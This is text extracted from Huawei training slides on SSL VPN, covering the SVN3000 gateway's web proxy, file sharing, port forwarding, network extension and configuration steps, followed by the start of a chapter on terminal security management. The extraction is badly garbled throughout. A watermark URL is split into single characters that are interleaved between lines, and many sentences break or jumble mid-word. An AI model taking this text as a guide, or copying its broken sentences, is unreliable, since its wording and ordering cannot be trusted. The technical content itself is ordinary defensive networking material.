SSL Principle Handshake

Protocol
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/Before the SSL communications,

/
p: the handshake protocol is used to
ou
:
s
e
c
r
n
r
a
e
r
o
g
n
i
s
e
R
t
t
h
negotiate the security parameters

(such as encryption algorithm,
shared key, and materials used for
generating the key) and
authenticate the peers.
Le
Pa ge 11
n
e
/
m
o
c
SSL Principle Session Recovery
.
i
e
w
a
u
h
.
g
n
i
If then client and server have
r
a
communicated
with each other,
e
l
/they can skip the handshake
/
:
p
t process and directly exchange
t
h
data. The SSL uses the session
:
s
e
recovery function to reduce the
c
r
u
huge overhead generated for the
o
s
e
SSL handshake.
R
g
n
i
n
r
a
Le
r
Pa ge 13
Copyrig
o
n
e
/
m
o
c
SSL VPN Introduction
.
i
e
w
a
u
SVN3000 security access gateway
h
.
g
n
i
n
r
a
le
/
/
p:
t
t
h
Cutting edge
virtual
gateway
: proxy
sWeb
e
c
r
File sharing
u
o
s
Port
proxy
n
r
a
e
r
o
Le
g
n
i
Re
Network
expansion
Comprehe
nsive log
function
User security
control
Pa ge 14
n
e
/
m
o
c
Virtual Gateway
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
g
n
i
Re
The SVN provides the SSL VPN services using the virtual gateway.
Le
An SVN can be configured with a maximum of 128 virtual gateways.
e
r
o
Pa ge 15
n
e
/
m
o
c
Web Proxy
.
i
e
w
a
u
The Web proxy enables users to safely access intranet

Web
g.
r
a
e
l
The Web proxy supports clientless Web access.
/
/
: modes: Web-link and Web
p
The Web proxy supports two implementation
t
t
h
rewriting.
:
s
e
c
r
SVN3000
u
Web server
o
s
e
R
g
Remote user in
n
r
a
e
L
r
Pa ge 16
Copyrig
o
resources.
n
i
n
File Sharing
n
e
/
.
i
e
m
o
c
The file sharing function supports secure access to the internal

aw file system.
u
h
The SSL VPN uses the protocol conversion technology to provide .
the file sharing function.
g
Users can safely access the intranet file system directly from the
browsers.
n
i to the corresponding
The SSL VPN converts the file sharing requests from the users
n
r
protocol formats to interact with the servers.
a
e
l
Protocols:
/
/
:
SMB (Windows)
p
tSupporting Windows system
NFS (LINUX)
t
h (SMB)/UNIX system (NFS)
:
s
e
c
r
u
oNew
s
Rename
Rename
e
folder
the
file or
or
the
file
R
folder
folder
g
Delete the
n
Browse Download
Upload
i
file or
n
the file
the file
the file
folder
r
a
Le
r
Pa ge 17
Copyrig
o
n
e
/
m
o
Implementation of File Sharing i.c
Taking the access of internal Windows file server as anwe
example, the
a
implementation of file sharing is as follows:
u
h
.intranet. The HTTPS1. The client sends an HTTPS-format request to the file server on the
g
n
format request is sent to the SVN.
i
n packet.
r
2. The SVN converts the HTTPS-format request to the SMB-format
a
e
3. The SVN sends the SMB-format packet to the file server.
l
/
/SMB-format response to the SVN.
4. The file server receives the request and sends the
:
pthe HTTPS-format packet.
5. The SVN converts the SMB-format response to
t
t
6. The SVN sends the HTTP-format packet tohthe client.
:
s
e
c
r 5
u
6 o
s
4
e
R
g
3
n
File server
Client
1
i
n
2
r
a
e
L
r
Pa ge 18
Copyrig
o
HTTPS
HTTPS
SMB/NFS
SMB/NFS
m
o
Characteristics of File Sharingi.c
e
w
a
u
h
.
g
n
i
File-level access
SSL encryption for
n
r control
permission
file transmission
a
e
l
/
/
:
p
SVN3000
file
sharing
Extra access
t
Authentication
t
control on the
h
on file access
SVN
: factors
Success
s
e
c
r
u
o is as secure and convenient as that on the local
The access of file system
s
computer.
Re
g
n
i The hot key Ctrl+C cannot be used.
n
r
a
Le
r
Pa ge 19
Copyrig
o
n
e
/
Port Forwarding
n
e
/
.
i
e
m
o
c
w
a
The port forwarding function provides various TCPuapplication
h
.
g
services on the intranet.
n
i
n
r
a
Supports TCP applications over static
e ports
l
/
/
Single-port single-server (Telnet,:SSH, MS RDP, VNC)
p
t
ht Notes)
Single-port multi-server (Lotus
:
s
e(Outlook)
Multi-port multi-server
c
r
u
o
s
Supports TCP applications
over dynamic ports
e
R
g (FTP, Oracle)
Dynamicnports
i
n
r
a
Provides
Le port-level access control
r
Pa ge 20
Copyrig
o
m
o
c
Principles of Port Forwarding i.

e
w
a
u
h
.
g
n
ni
CLIENT
Providing secure
/
/
:
p
applications on
t
t
the intranet
h
:
s
e
Internet
SVN3000
c
r
u
o
s
access to TCP
Application
request
Application
agent
n
r
a
e
r
o
SSL
g
n
i
r
a
le
TCP 110
TCP 25
TCP 21
Le
SERVER
TCP 23
Re
Pa ge 21
n
e
/
n
e
/
m
o
c
Port Forwarding Features
.
i
e
w
a
u
SVN3000
Port forwarding
4
g
n
i
n
r
a
e
r
o
Support of various intranet TCP

applications
h
.
g
n
i
n
r
a
e
Remote desktop, Outlook, Notes,
l
/
FTP, and SSH
/
: on all data
p
Encryption authentication
t
t
flows
h
:
Global authentication
and
s
e on users
authorization
c
r
u
Access
o control over TCP applications
s
Re
Ensure the
security and
reliability of TCP
applications, and
provide easy
operation and
management
methods
Standard browser without requiring

client installation
Le
Pa ge 22
Network Extension
m
o
c
n
e
/
.
i
e the
The network extension function supports the access towall
a
u
complex applications on the entire network.
h
.
gall the applications on
By establishing the secure SSL tunnel, users can access
n
i
the IP-based intranet.
n
r
a
Implementation mode
e
l
ActiveX control
/
/
:
Private client software: one-off installation p
requiring
no manual configuration
t
Access mode (configured by the administrator
based on different application
ht
scenarios)
:
s
e only the enterprise interface network.
Full Tunnel: The user can access
c
r
Split Tunnel: The user canuaccess the intranet and local subnet.
ocan access the resources in the specified network segment
s
Manual Tunnel: The user
e
R
of the enterprise network. The network access does not affect other operations. Users
g
can access thenInternet
and local subnet.
i
n
r
a
e
L
r
Pa ge 23
Copyrig
o
n
e
/
1.
2.
3.
4.
m
o
c
Implementation of Network Extension
.
i
e
w
On the client, download the control and
a
u
install the virtual network adapter. The
h
virtual network adapter can obtain an IP
.
g
address that can be identified by the
n
i
intranet.
n
r
a
The client originates a request for
e
l
accessing the applications of the IP/
/
based intranet. The virtual gateway
:
intercepts the request and performs tp
encapsulation and encryption. Then, theht
virtual gateway sends the packet to :the
s
SVN.
e
c
The SVN decrypts the packetrand then
u server.
o
sends the packet to the intranet
s
e
The intranet server sends
R a response to
the SVN. The g
SVN encrypts and
n
encapsulates the
i packet. Then, the
n
SVN sends the
packet to the client.
r
a
e
L
r
Pa ge 24
Copyrig
o
n
e
/
m
o
c
Full Tunnel
.
i
e
w
a
u
.
Headquarters
g
Intranet
in resources
n
r
a
e
l
LAN
Internet
:
s
e
c
r
/
/
p:
t
t
h
u is
All the traffic
o
s to
e
transmitted
R
the
g gateway.
SSL VPN tunnel
n
i
n
e
r
o
r
a
e
Pa ge 25
n
e
/
m
o
c
Split Tunnel
.
i
e
w
a
u
Headquarters
h
.
Intranet
ng resources
i
n
r
LAN
a
e
l
Internet
/
/
p:
t
t
h
:
s
e the
Exceptcfor
r the client
u
intranet,
o
s
cane access the local
R to which the
subnet
ng
i
n
r
e
r
o
SSL VPN tunnel
client belongs.
a
e
L
Pa ge 26
n
e
/
m
o
c
Manual Tunnel
.
i
e
w
a
u
h
.
g
Headquarters
Intranet resources
n
i
n
LAN
r
a
le
Internet
/
/
p:
t
t
h
e
r
o
:
s
e the
The client can access
c
r
resources in theuspecified
oThe client can
network segment.
s
still access the
Relocal subnet and
gat the same time.
Internet
n
i
n
r
a
Le
SSL VPN tunnel
Pa ge 27
n
e
/
m
o
c
SSL VPN Advantages
.
i
e
w
a
u
h
.
g
Convenient deployment without
n
i
n
r
a
le
clients
Security protection for application://
layer access
Improvement of enterprise
es
c
r
u
o
s
e
efficiency
n
r
a
e
r
o
g
n
i
p
t
ht
Le
Pa ge 28
m
o
c
Disadvantages of Traditional VPNs
.
i
e
w
a
u
L2TP
h
and
IPSec
.
MPLS
g
dial-up
n
i
Insecure
Insecure
High
client
n
No
user
authentication
r
Extra expenses for
management costs
a
No application
e NAT problems
dial-up
permission
l
Restriction of dial-up
/ Security risks
No auditing
/
access port on the
No application-based
No encryption :
p
No access control
server
user authentication,
t
High
cost
t
Lack of data
permission, and
h
Interconnection
authentication
auditing
problems
between
:
No application-based
s
carriers
e
access control policy
Applicable to the
c
r interconnection
IP address leakage of
u
between large-scale
the intranet
o
s intranets
e
R
g
n
i
n
r
a
Le
r
Pa ge 29
Copyrig
o
n
e
/
m
o
c
SSL VPN Example Common Application
.
i
e
w
a
u
h
.
Partner
g
n
i
Mobile office
n
r
a
e
l
/
Branch
/
Intranet
:
Internet
p
t
ht
ERP
Linux/NFS
:
s
e
c
SMB
Email
r
Remote maintenance
Clientou
s
Web server
e
R
Encrypted external connection
g
n
Standard internal connection
i
n
r
a
Le
r
Pa ge 30
Copyrig
o
n
e
/
n
e
/
m
o
c
SSL VPN Example Operation Application
.
i
e
w
a
Example
u
h
.
Virtual firewall
g
n
i
Virtual SSL VPN gateway
n
Trust server cluster
r
a
of enterprise A
e
IDS
l
/
/
:
SSL VPN
p
t
t
Enterprise
Server cluster of
h
user A
enterprise B
:
SW
s
e
Internet
SSL VPN
c
FW
r
u
Enterprise
o
s
user B
Server cluster
Re
of enterprise C
g
n
IDC
i
n
Enterpriser
a
user e
C
L
r
Pa ge 31
Copyrig
o
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. SSL VPN Overview
h
.
g
n
i
n
r
a
le
/
/
p:

tt
:
s
e
c
r
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 32
m
o
c
Authentication and Authorization
.
i
e
w
a
Certification authority:
u
h
.
VPNDB authentication and authorization ng

i
n
RADIUS authentication and authorizationr
a
e
l
LDAP authentication and authorization
/
/
:
X.509 digital certificate authentication
p
t
ht authentication
USB KEY+X.509 digital certificate
:
s
e
Authentication server
c
r
Remote access u
File server
o
sInternet
e
R
g
n
Web server
i
n
OA server
r
a
e
L
r
Pa ge 33
Copyrig
o
n
e
/
n
e
/
m
o
c
Terminal Security Policy
.
i
e
w
a
u
Terminal security threatens
.
Terminalgsecurity
policy
n
i
n
r
a
Non-effective e
l
Terminal self-security
implementation
/
/
Terminal accessing
:
p
unauthorized network
t
resources
t
h
Network resource
:
abuse by terminals
s
e
Damage caused by
c
r
malicious terminals
u
o
s
e
R
g
n
i
n
r
a
Le
r
Copyrig
o
Antivirus
software check
Process check
Port check
Firewall check
Operating system
check
File check
Registry check
Pa ge 34
n
e
/
m
o
c
SVN3000 Functions
.
i
e
w
a
u
h
.
g
n
i
n
Web access
Web proxy
SSL VPN
r
a
le File sharing
/
/
p:
File access
t
t
h
Other complex
services
n
r
a
Port forwarding
SVN3000
:
s
e IPSec VPN
c
Network
r
TCP applications
such as Notes and
Telnet
e
r
o
Web
u
o
s
g
n
i
Re
extension
IPSec VPN
Le
Pa ge 35
ERP
E-mail
n
e
/
m
o
c
Comprehensive Log Functions
.
i
e
w
a
u
System log
h
.
g
System reboot record, network interface status record, temperature alarm record, import
and export record, system administrator management record, and virtual gateway
management record
n
i
n
r
a
le
/
/
User successful login record, user failed login record,
: offline after login record, password
p
t
modification record, and service log
t
h
Virtual gateway administrator log :
s administrator login failure record, virtual gateway
e
Administrator online and offline record,
c
r
configuration saving record, userumanagement record, and security management record
o
s
Log export
e
R
Real-time log export,gtext-format log export, and CLI log export.
n
i
Log query
n
r
a page log query and CLI log query
HierarchicaleWeb
L
r
Pa ge 36
Copyrig
o
User log
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. SSL VPN Overview
h
.
g
n
i
n
r
a
le
/
/
p:

tt
:
s
e
c
r
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 37
n
e
/
m
o
c
SVN3000 Application Scenario

Typical Network Position
.
i
e
w
a
u
h
.
g
Partner
Mobile office
n
i
n
r
a
le
SVN3000
/
/
p:
Branch
Remote maintenance
Client
u
o
s
:
s
e
c
r
t
t
h
Headquarters
Web server
ERP
Email
Encrypted internal connection
NFS
Database
e
R
Generally, the SVN3000
is deployed between the enterprise edge firewall and
g
n
the application server.
i
nworks between the remote user and the server and is responsible
The SVN3000
r
athe communications between the remote user and the server.
for controlling
e
L
r
Pa ge 38
Copyrig
o
n
e
/
SSL VPN Application Scenario One- om

c
.
i
Armed Mode
e
w
a
The SVN3000 is connected to the firewall, router, or switch in uone-armed mode.
h
.
The SVN3000 communicates with the intranet and Internet
g over this network
n
i mode.
interface, which is know as the one-armed communication
n
r
a
e
Partner
l
/
/
SVN3000
:
Mobile office
Email
p
t
ht
Database
:
s
Branch
e
c
r
ERP
u
o
Remote maintenance s
AAA
e
Web server
RClient
g
Enterprise
n
i
headquarter
n
r
Encrypted internal connection
a
Le
e
r
o
Pa ge 39
n
e
/
SSL VPN Application Scenario Two- om

c
.
i
Armed Mode
e
w
a
The SVN3000 is connected to the firewall, router, or switch in two-armed
mode.
u
h different
.
The SVN3000 communicates with the intranet and Internet
over
g
n
i
network interfaces, which is known as the two-armedncommunication
mode.
r
a
Partner
e
l
SVN3000
/
Mobile office
/
Email
:
p
t
Database
ht
Branch
:
s
e
ERP
c
r
u
Remote maintenance
o
AAA
s
Web server
e
RClient
Enterprise
g
n
i
Encrypted internal connection headquarters
n
r
a
e
L
e
r
o
Pa ge 40
Enabling the Web NMS Function i.
m
o
c
Take the SVN3000 as an example.
Configuration process:
Configure the interface IP address.
Bind the Web NMS and the IP
e
w
a
u
h
.
g
n
ni
r
a
le
/
/
p:
address. Specify the port used to

bind the Web NMS and the IP
address.
t
t
h
:
s
address of the SVN3000 Web NMS e
c
in the address box, for example r
uto
o
https://x.x.x.x:port. Press Enter
s
e
enter the Web NMS login
interface.
R
gand password
Enter the user name
n
i to log in to the
on the login page
n
SVN3000.ar
Le
r
Copyrig
o
Start the Web browser. Enter the IP
Pa ge 41
n
e
/
n
e
/
Configuring the Virtual Gateway and om

c
.
i
Related Parameters
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
After logging in ntog the SVN3000 Web NMS interface, click Virtual
i
n
Gateway Management.
r
a
Le
e
r
o
Pa ge 42
m
o
c
Web Proxy Access Instance (1) i.

e
w
a
u
h
.
g
n
ni
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
Re
n
e
/
g
n
i Gateway List navigation tree, click Web proxy to
On the Virtual
n
r
enter theea
configuration interface.
L
r
Pa ge 43
Copyrig
o
m
o
c
e
w
a
u
h
.
Configure the Web-link resources.
g
n
ni
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
Re
Enable the Web-Link

function.
in
n
r
a
e
r
o
Le
Pa ge 44
n
e
/
m
o
c
e
w
a
n
e
/
When you click a link, you can view the corresponding

hu linked Web
.
g
n
i
n
page.
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 45
m
o
c
n
e
/
e
w
a also view
When you click the sub-link on the Web page, you ucan
h
.
the corresponding linked Web page.
g
n
i
n
r
a
e
l
/
/
:
p
t
t
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 46
Copyrig
o
n
e
/
m
o
c
File Sharing Access Instance (1)
.
i
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i List navigation tree, click File Sharing to enter the configuration
On the Virtual Gateway
n
r
interface. ea
L
r
Pa ge 47
Copyrig
o
m
o
c
.
i
e
w
a
u
h
Configure the file sharing resources.
.
g
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
Enable the file
sharing function.
r
a
e
L
r
Pa ge 48
Copyrig
o
n
e
/
m
o
c
.
i
e
w
a
u
File sharing resource list displayed on the client
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 49
Copyrig
o
n
e
/
n
e
/
m
o
c
.
i
e
w name,
Click a resource on the file sharing list. Enter the user
a
u file server
h
password, and domain. Submit the information to
the
.
g
for authentication.
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 50
Copyrig
o
n
e
/
m
o
c
.
i
e
w
a
List of resources in the shared folder
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 51
Copyrig
o
Port Forwarding
n
e
/
m
o
c
.
i
e
w
The port forwarding function provides various TCP application
a
u
h
services on the intranet.
.
g
n
i ports
Supporting TCP applications over the static
n
rRDP, and VNC)
a
Single-port single-server (Telnet, SSH, MS
e
l
/
Single-port multi-server (Lotus Notes)
/
:
p
t
Multi-port multi-server (Outlook)
t
h
Supporting TCP applications
: over the dynamic ports
s
e mode, Oracle)
c
Dynamic port (FTP passive
r
u
o control
Providing port access
s
Re
g
n
i
n
r
a
Le
r
Pa ge 52
Copyrig
o
n
e
/
m
Port Forwarding Application Instance
o
c
.
i
(1)
e
aw
u
h
.
g
n
ni
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
g
n
i
Re
On the Virtual Gateway List navigation tree, click Port Forwarding to enter the
configuration interface.
n
r
a
e
r
o
Le
Pa ge 53
n
e
/
m
o
c
.
i
(2)
e
aw
Configure the port forwarding resources.
u
h
.
g
n
ni
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
g
n
i
Re
Enable the
rn port forwarding function.
e
r
o
a
e
L
Pa ge 54
n
e
/
m
o
c
(3)
.
i
e
w
a
u
Click Start to enable the port forwarding function.
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 55
Copyrig
o
n
e
/
m
o
c
(4)
.
i
e
w
a
Access the configured resources using the port forwarding
u
h
.
g
function, for example, Telnet.
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 56
Copyrig
o
n
e
/
m
o
c (1)
Network Extension Access Instance
.
i
e
w
a
Configure the IP address allocation mode and client routing
u
h
.
g
mode.
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
rnetwork extension function.
a
Enable the
Le
r
Pa ge 57
Copyrig
o
n
e
/
m
o
c (2)
.
i
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Click the
Lebutton to start the network extension function.
r
Pa ge 58
Copyrig
o
n
e
/
m
o
c (3)
.
i
e
w
a
u
h
. control is
After the Active
g
n in to the
i
installed,
log
n
r
a again on the
SVN3000
e
l client. The client is
/
remote
/
:
p allocated a virtual IP address
t
ht of the intranet and functions
:
s
as a device on the LAN.
e
c
r
u
o
s
e
R
g
n
Note:
During
the operation, do not close this window.
i
n
r
Otherwise,
the network extension function is disabled.
a
e
L
r
Pa ge 59
Copyrig
o
n
e
/
m
o
c (4)
.
i
e
w
a
u Log in to the
Application instance:
h
.and browse the
remote desktop
Application instance: FTP
g
n the intranet.
video files on
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 60
Copyrig
o
n
e
/
Login Interface of Network Extension om

c
.
i
Client
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
The network extension can be implemented
e
c
by installing the dedicated client software.
r
u
You can download the software o
from the
s
SVN3000 interface. The software
e requires
R
only once installation and no configuration.
gthe network
n
You can directly enable
i
n
extension function
using the network
r
a software.
extension client
e
L
e
r
o
Pa ge 61
n
e
/
m
o
VPNDB Application Instance (1) i.c
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
t
h
:
s
e
c
r
u
o
s
Re
g
n
i
Click VPNDB n
Configuration
to enter the configuration interface.
r
a
Le
r
Pa ge 62
Copyrig
o
n
e
/
m
o
VPNDB Application Instance (2) i.c
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
t
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Click Add in
User Information Management to enter the configuration interface.
Le
r
Pa ge 63
Copyrig
o
n
e
/
m
o
c
Summary
SSL VPN technology
.
i
e
w
a
u
h
.
g
n
i
Basic functions and features of the SVN3000
n
r
a
e
Methods for configuring the SSL VPN
l
/
/
:
p
t
t
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Copyrig
o
Pa ge 64
n
e
/
m
o
c
Questions
.
i
e
w
a
u
What scenarios does the SSL VPN apply to?
n
i
What functions do the virtual gateway of thenSSL VPN provide?
r
a
e
What are the differences between the exclusive
and shared
l
/ application scenarios?
virtual gateways? What are the respective
/
:
p
t of Web proxy, file sharing,
What are the application scenarios
t
h
port forwarding, and network: extension
functions?
s
e
What are the three access
modes of the network extension
c
rdifferences between their implementation
u
function? What are the
o
s
mechanisms?
Re
g
n
i
n
r
a
Le
r
Pa ge 65
Copyrig
o
h
.
What security services does the SSL VPN provide?
g
n
e
/
m
o
c
Answer
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 66
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
Thank :you
//
p
www.huawei.com
t
t
:
s
e
c
r
u
o
s
n
r
a
e
r
o
Le
g
n
i
Re
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
Chapter 11 Terminal rnin

a
e
l
Security
/
:/
:
s
e
c
r
p
t
ht
u
o
s
n
r
a
g
n
i
Re
e
L
e
r
o
www.huawei.com
Objectives
n
e
/
.
i
e
m
o
c
w
a
u to:
able
.
g
n
Terminal security
i
n
r
a system
Components and deployment of the
TSM
e
l
/
/
:
Organization management and
access
control modes of the
p
t
t
TSM system
h
:
s
Configuration of security
e policies for the TSM system
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 1
Copyrig
o
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. Overview of Terminal Security

2. Deployment of the TSM System
n
i
n
h
.
g
r
a
e
3. Deployment of Terminal Security/lPolicies
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 2
Copyrig
o
n
e
/
m
o
c
Most Threats Come from Intranets
.
i threats
lists 14esecurity
wshould not be ignored
a
that
u
h
. in enterprises.
g
n
According to Computer Security Institute
i
n
(CSI) in San Francisco, California, the
r
a
United States, about 60% to 80% of
e
l
network misuse events come from
/
/
intranets.
:
p
t
ht
:
s
e
c
r File Sever
u
o
s
Mail Sever
Re
g
n
Web Sever
i
n
r
a
Le
r
Pa ge 3
Copyrig
o
n
e
/
Crises Surrounding Enterprises om

c
.
i
Terminals
e
w
.
g
n
i
n
Endless terminal
exceptions
Failures to prevent
disclosures
Unauthorized access
Unintentional disclosure
Do things irrelevant to
work at working hours
Access resources not

related to work
Misuse of network
resources
i
n
r
e
r
o
Slow computer speed
t
t
h
ou
ng
:
s
e
c
r
r
a
e
l
Network
or software exception
/
/
: system crashes
pFrequent
Intentional disclosure
Difficulty in implementing
conduct codes
s
e
R
a
u
h
Too many problems

to monitor
Unexpected
network threats
Slow network speed
Service interruption
Service exception
a
e
L
Pa ge 4
n
e
/
m
o
c
What Is Terminal Security?
.
i
e
w
a
u
h
.
g
n
i
n
Patch management
software
r
a
le
Personal firewall
/
/
p:
Antivirus software
s:
t
t
h
e
c
r
Software
terminal security
u 3-D defense
o
s
Re
n
r
a
e
r
o
Le
g
n
i Access control+desktop
management+security management
Pa ge 5
n
e
/
m
o
c
Contents
.
i
e
w
a
u

n
i
n
h
.
g
r
a
e
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 7
Copyrig
o
n
e
/
m
o
Overview of the TSM System Architecture
.c
Post-authentication domain
File server Mail server OA server
Composition of
the TSM system
r
a
le
terminals
/
/
p:
TSM domains
:
s
e
c
r
802.1X switch
g
n
i
u
o
s
Re
n Web Agent
r
a
Web
e
r
o
Le
Guests
a
u
h
.
g
n
i
SC
n
Access mode of
i
e
w
SM
SC
Isolation domain
t
t
h
AV server
SACG
Patch server Repair server
Common switch
Agent
Users of an enterprise
Manager of an
enterprise manager
Pa ge 8
n
e
/
m
o
c
Centralized Deployment
SA
w
a
u
h
.
g
Internet
Branch
n
i
n
r
a
le
SACG
VPN gateway
SA
/
/
p:
SA
:
s
e
c
r
SA
t
t
h
n
r
a
g
n
i
Re
Post-authentication domain 3
TSM server
Le
u
o
s
SA
e
r
o
.
i
e
AD domain server
AV server
Patch server
Pa ge 9
n
e
/
m
o
c
Distributed Deployment
w
a
u
Core resource server
SA
Post-authentication
domain
Internet
h SM
.
g
n
i
n
r
a
le
SC
Branch
Intranet
:
s
e
c
r
/
/
p:
SACG
Border router
t
t
h
Antivirus server
AD domain server
u
o
s
SC
g
n
Re
SACG
rn
e
r
o
aSA
e
L
SC
SACG
SACG
SA
Office A
.
i
e
SA
SA
SACG
Office B
SA
SA
Pa ge 10
n
e
/
m
o
c
Access Control of the SACG
.
i
Post-authentication
domain
e
w
a
u
hSensitive
Hardware SACG
. resources
g
n
i
n
r
a
e
TSM server
l
/
/
:
p
t
Finance department: No TSM Agent is

installed for new employees.
Marketing department: Agents are installed.
e
c
r
Identity
authentication
URL redirection
The SACG
provides the Web
pushing function to
download the TSM
Agent for
installation
u
o
User s
e
name+password
R
LDAP
g
n
i
n
r
e
r
o
s:
ht
a
e
L
MAC
AV server...
Security check
Is the antivirus
software running?
Are the OS, Office,

Internet Explorer,
and database patch
installed?
Is the virus
database updated?
Is any illegitimate
software installed?
Public
resources
Isolation domain
Switchover to the
post-authentication domain
The TSM notifies the SACG of sending

ACL rules and switching to the postauthentication domain.
Automatic security
repair
Upgrade the antivirus software
Update the virus database
Download patches automatically
Pa ge 11
n
e
/
m
o
c
Access Control of Host Firewall i.

e
w
a
Post-authentication
u
h
.
Access control of host firewall
Trusted domain 2:
domain
g
n
ni
Network
Market department
resources
r
a
le
/
/
p:
Access between trusted

domain is not allowed.
External untrusted terminals
s:
cannot access trusted terminals.

Trusted domain 1:
Finance department
Identity
authentication
User name +
password
LDAP
MAC
n
r
a
e
r
o
Le
g
n
i
es
ou
e
c
r
AV server Patch server

Isolation domain
TSM server
Switch to the post-
Security policy check
Is the antivirus
software running?
Is the virus database

updated?
Are the OS, Office, IE,

and database patch
installed?
Is any illegal software

installed?
fails, and only

restricted
t
t
h
Security check
authentication domain
The TSM specifies an access
policy to control the trusted
domain and post-authentication
domain that a terminal can
access.
Automatic security
repair
Pa ge 12
network
resources are
provided to
isolate threats.
n
e
/
m
o
c
802.1X Access Control
.
i
Post-authentication
e domain
w
a
u
h
Sensitive
.
g resources
n
ni
802.1X access control
r
a
le
Terminal 1
Ports on an insecure terminal are
disabled and neighbor terminals

cannot be accessed through these
:
s
e
c
r
Terminal 2 ports.
802.1x authentication
User name+password
LDAP
MAC
n
r
a
e
r
o
Le
g
n
i
ou
s
e
R
/
/
p:
Isolation domain
t TSM server
t
h
Security policy check
Is the antivirus software

running?
Is the virus database is

updated?
Are the OS, Office, IE, and

database patch installed?
Is any illegitimate software

installed?
AV server
Pre-authentication
domain
Dynamically switch a VLAN

The switch dynamically
switches the VLAN to
control the postauthentication domain that
a terminal can access
Automatic
security repair
Pa ge 13
Patch server
n
e
/
m
o
c
Contents
.
i
e
w
a
u

n
i
n
h
.
g
r
a
e
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 14
Copyrig
o
n
e
/
Major Functions of the TSM System com

.
a
u
h
Guest management
Exceptional device
management
Forced compliance
evaluation
Access range of authorized
users
Identity authentication
Anonymous/Local
account
AD/Third-party LDAP
PKI/CA
Compliance check
Security evaluation
System configuration
check
User access binding
One-key automatic repair
Time-based NAC
e
r
o
r
a
e
Security enhancement
Antivirus
Patch/service pack
Suspicious process/registry
Dangerous port/service
Software
blacklist/whitelist
Illegal sharing/account
security
Illegal network
configuration
Office behavior management
Network access auditing
Media downloading
Non-office software
Terminal online record

Customized security policies
Information disclosure
prevention
Peripheral management
Portable storage
management
Network access
monitoring
Monitoring of illegal
external connections
File operation auditing

Network protection
ARP protection
IP/MAC binding
Traffic auditing
IP access rules
Control of malicious
network programs
Internet-intranet
connection monitoring
IP device access auditing
Patch management
One-stop download and

installation
Strong cooperation of
the WSUS
Quick subnet
distribution
Asset management
Lifecycle management
Asset change alarm

management
Automatic IP device
identification
Software distribution
Remote assistance
Message announcement
Network identification
Pa ge 15
Operability report
Process policy model
Access Control
Authority and domain based

management
.
g
n
i
Scalable and upgradeable policies and reporting
service
n
r
Desktop
a Management
Security Management
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
e
R
g
n
ni
TSM
i
e
w
n
e
/
m
Organization Management Function
o
c
.
Management Dimension I
i
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
e
r
o
Pa ge 16
n
e
/
Network Domain Management Management

m
o
c
.
Dimension II
i
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
e
r
o
Pa ge 17
n
e
/
Identify Authentication Functioni.
m
o
c
Ordinary user name + password authentication
MAC account authentication
AD account authentication
LDAP authentication
Support for USB key authentication
:
s
e
c
r
e
w
a
u
h
.
g
